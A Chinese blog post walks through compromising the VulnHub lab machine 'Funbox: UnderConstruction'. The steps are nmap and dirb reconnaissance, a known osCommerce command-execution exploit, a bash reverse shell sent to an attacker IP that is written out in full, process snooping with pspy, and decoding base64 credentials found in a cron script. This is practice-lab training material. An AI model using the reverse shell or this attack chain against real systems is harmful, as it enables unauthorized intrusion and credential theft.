热门标签 | HotTags
当前位置:  开发笔记 > 编程语言 > 正文

vulnhubFunbox:UnderConstruction

环境搭建:Funbox:UnderConstruction!~VulnHub漏洞复现:探测靶机的IP地址nmap进行探测靶机的服务和端口访问80端

环境搭建:

Funbox: Under Construction! ~ VulnHub


漏洞复现:

探测靶机的IP地址

nmap进行探测靶机的服务和端口

 访问80端口

 

 dirb扫描目录,发现catalog目录

 

访问一下,发现是个oscommerce的网站

 

查看版本的漏洞,发现命令执行漏洞 

 

查看该文件,如果执行成功,会返回当前目录的文件

 

修改为靶机的IP

 

运行脚本

 

访问文件,得到回显

 

修改命令


bash -c "exec bash -i &>/dev/tcp/192.168.226.128/1111 <&1" 


 

查看全局变量,查看执行文件都没发现可以利用 

下载pspy64s

wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64s

 

 kali开启python服务,靶机进行下载

修改权限,进行执行

 

发现会执行一个脚本文件

 发现一个base64语句

 

进行解密,发现账号密码

 切换用户登录,要升级shell模式,不然不可以切换用户

 

查看目录下的flag

 


推荐阅读
author-avatar
Only_cxy
这个家伙很懒,什么也没留下!
PHP1.CN | 中国最专业的PHP中文社区 | DevBox开发工具箱 | json解析格式化 |PHP资讯 | PHP教程 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | 在线工具
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved | 京公网安备 11010802041100号 | 京ICP备19059560号-4 | PHP1.CN 第一PHP社区 版权所有